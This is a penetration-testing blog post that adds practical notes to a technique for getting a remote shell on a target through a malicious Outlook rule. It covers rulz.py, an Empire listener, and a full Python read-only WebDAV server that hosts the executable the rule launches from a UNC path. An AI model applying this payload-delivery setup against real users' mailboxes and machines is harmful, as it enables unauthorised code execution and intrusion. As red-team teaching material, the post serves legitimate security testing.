Malicious Outlook Rules in Action

Getting a shell with a malicious Outlook rule is an awesome tool during a pentest and great fun! Nick Landers' post has enough information to make this happen, although it leaves a few things for the reader to figure out and there is one gotcha. In this post I provide some additional information to help you get this going.

First, the Gotcha . . .

You need Python 3 to run the rulz.py script. Under Python 2.x it fails with an error similar to the one shown below.

Rulz.py Error When Run with Python 2.x

Second, details for setting up a WebDAV server . . .

The original SilentBreak Security blog post gave minimal details on setting up the WebDAV server, so I provided detailed instructions here. I suggest making the WebDAV share read-only so your payloads cannot be maliciously overwritten: a writable share lets anyone who finds it replace the executable the rule launches. When rulz.py asks where to save the generated rule, give it a local filename; the WebDAV location is what goes into the rule as the path of the payload to launch, not where the rule file itself is written. I also provide expanded information on setting up your Empire listener here to improve your chances of success.
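Concretely, the read-only server I am recommending can be as small as the script below. This is an added example and not code from the original post, from SilentBreak Security or from rulz.py. It serves a payload directory over WebDAV (GET, HEAD, OPTIONS and PROPFIND only) and answers every write verb with 403, logging each refusal. The function names are my own, and the claim that the property set in the PROPFIND response is enough for the Windows WebClient (Mini-Redirector) is an assumption, not something the post documents.

```python
#!/usr/bin/env python3
"""Read-only WebDAV server for the payload a malicious Outlook rule launches.
Added example, not code from the original post, from SilentBreak Security or from
rulz.py. Serves GET/HEAD/OPTIONS/PROPFIND from a directory and answers every write
verb (PUT, DELETE, MKCOL, MOVE, COPY, PROPPATCH, LOCK ...) with 403, so a hosted
payload cannot be replaced. Assumption: the property set emitted below is enough
for the Windows WebClient (Mini-Redirector); Microsoft documents no required
minimum. Needs Python 3.7+ (ThreadingHTTPServer, directory= on the handler).
"""
import functools
import os
import sys
from datetime import datetime, timezone
from email.utils import formatdate
from http.server import SimpleHTTPRequestHandler, ThreadingHTTPServer
from xml.sax.saxutils import escape

READ_METHODS = ("GET", "HEAD", "OPTIONS", "PROPFIND")

def entry_xml(href, name, is_dir, size, modified, created):
    """One DAV:response element; `modified` is an HTTP-date, `created` ISO-8601 UTC."""
    if is_dir and not href.endswith("/"):
        href += "/"                       # collections are addressed with a trailing slash
    rtype = "<D:resourcetype><D:collection/></D:resourcetype>" if is_dir else "<D:resourcetype/>"
    length = "" if is_dir else "<D:getcontentlength>%d</D:getcontentlength>" % size
    return ("<D:response><D:href>%s</D:href><D:propstat><D:prop>"
            "<D:displayname>%s</D:displayname>%s%s"
            "<D:getlastmodified>%s</D:getlastmodified>"
            "<D:creationdate>%s</D:creationdate><D:supportedlock/>"
            "</D:prop><D:status>HTTP/1.1 200 OK</D:status></D:propstat></D:response>"
            % (escape(href), escape(name), rtype, length, modified, created))

def entry_for(href, fs_path):             # entry_xml() built from the file's own metadata
    st = os.stat(fs_path)
    modified = formatdate(st.st_mtime, usegmt=True)
    created = datetime.fromtimestamp(st.st_ctime, timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")
    name = os.path.basename(fs_path.rstrip("/\\")) or "/"
    return entry_xml(href, name, os.path.isdir(fs_path), st.st_size, modified, created)

def propfind_body(href, fs_path, depth):
    """DAV:multistatus for fs_path; its children are listed unless Depth is 0."""
    parts = [entry_for(href, fs_path)]
    if depth != "0" and os.path.isdir(fs_path):
        for child in sorted(os.listdir(fs_path)):
            parts.append(entry_for(href.rstrip("/") + "/" + child, os.path.join(fs_path, child)))
    return ('<?xml version="1.0" encoding="utf-8"?><D:multistatus xmlns:D="DAV:">'
            + "".join(parts) + "</D:multistatus>")

class ReadOnlyDAVHandler(SimpleHTTPRequestHandler):
    protocol_version = "HTTP/1.1"

    def end_headers(self):
        self.send_header("DAV", "1")                # class 1 DAV: no locking, fine for read-only
        self.send_header("MS-Author-Via", "DAV")
        super().end_headers()

    def _drain(self):                               # discard any request body before replying
        self.rfile.read(int(self.headers.get("Content-Length") or 0))

    def do_OPTIONS(self):
        self.send_response(200)
        self.send_header("Allow", ", ".join(READ_METHODS))
        self.send_header("Content-Length", "0")
        self.end_headers()

    def do_PROPFIND(self):
        self._drain()
        fs_path = self.translate_path(self.path)
        if not os.path.exists(fs_path):
            self.send_error(404)
            return
        body = propfind_body(self.path.split("?")[0], fs_path,
                             self.headers.get("Depth", "infinity")).encode("utf-8")
        self.send_response(207, "Multi-Status")
        self.send_header("Content-Type", 'application/xml; charset="utf-8"')
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def _deny(self):                                # every write verb: log it, then refuse
        self._drain()
        self.log_message("refused %s %s", self.command, self.path)
        self.send_error(403, "read-only share")

    do_PUT = do_POST = do_DELETE = do_MKCOL = do_MOVE = do_COPY = do_PROPPATCH = do_LOCK = do_UNLOCK = _deny

def main(argv):
    port = int(argv[1]) if len(argv) > 1 else 80    # WebClient maps \\host\share to port 80
    directory = argv[2] if len(argv) > 2 else os.getcwd()
    handler = functools.partial(ReadOnlyDAVHandler, directory=directory)
    with ThreadingHTTPServer(("0.0.0.0", port), handler) as httpd:
        print("read-only WebDAV on port %d serving %s" % (port, directory))
        httpd.serve_forever()

if __name__ == "__main__":
    main(sys.argv)
```

Run it as root (or with CAP_NET_BIND_SERVICE) on port 80 so the target's WebClient can reach the payload as \\host\share\payload.exe; on any other port the UNC form is \\host@port\share\payload.exe. Every refused write is logged, so a PUT or DELETE against the share during the engagement tells you someone other than the rule has found it.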

Third, be sure to close your local instance of Outlook before sending the trigger email to the target. Otherwise the rule can fire in your own Outlook, and the payload executes on your machine instead of theirs.

Fourth, Shellz!

Additional References:

  • Getting Outlook Credentials:
  • More on Malicious Rules:

______

For tips on getting a shell through a malicious Outlook rule without using an EXE file, see this related post.